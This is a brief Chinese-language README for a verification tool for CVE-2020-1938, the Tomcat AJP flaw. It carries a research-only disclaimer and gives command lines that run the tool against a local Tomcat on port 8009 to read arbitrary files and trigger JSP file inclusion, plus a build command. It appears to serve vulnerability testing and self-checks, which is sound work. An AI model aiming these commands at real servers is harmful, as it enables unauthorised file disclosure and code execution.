CVE-2020-1938
工具仅用于安全研究以及内部自查,禁止使用工具发起非法攻击,造成的后果由用户负责
通过测试研究发现,该突破危害及其严重,涉及非常广泛,如果发现建议立即进行修复
apache-tomcat-8.5.32.zip测试tomcat
验证工具-1(有BUG):
任意文件读取
java -jar 1.jar com.threedr3am.bug.tomcat.ajp.FileRead 127.0.0.1 8009 file /index.jsp
文件包含
java -jar 1.jar com.threedr3am.bug.tomcat.ajp.FileRead 127.0.0.1 8009 jsp /index.jsp
打包方式:在目录tomcat / ajp-bug执行mvn clean compile assembly:assembly
来源: :
验证工具-2
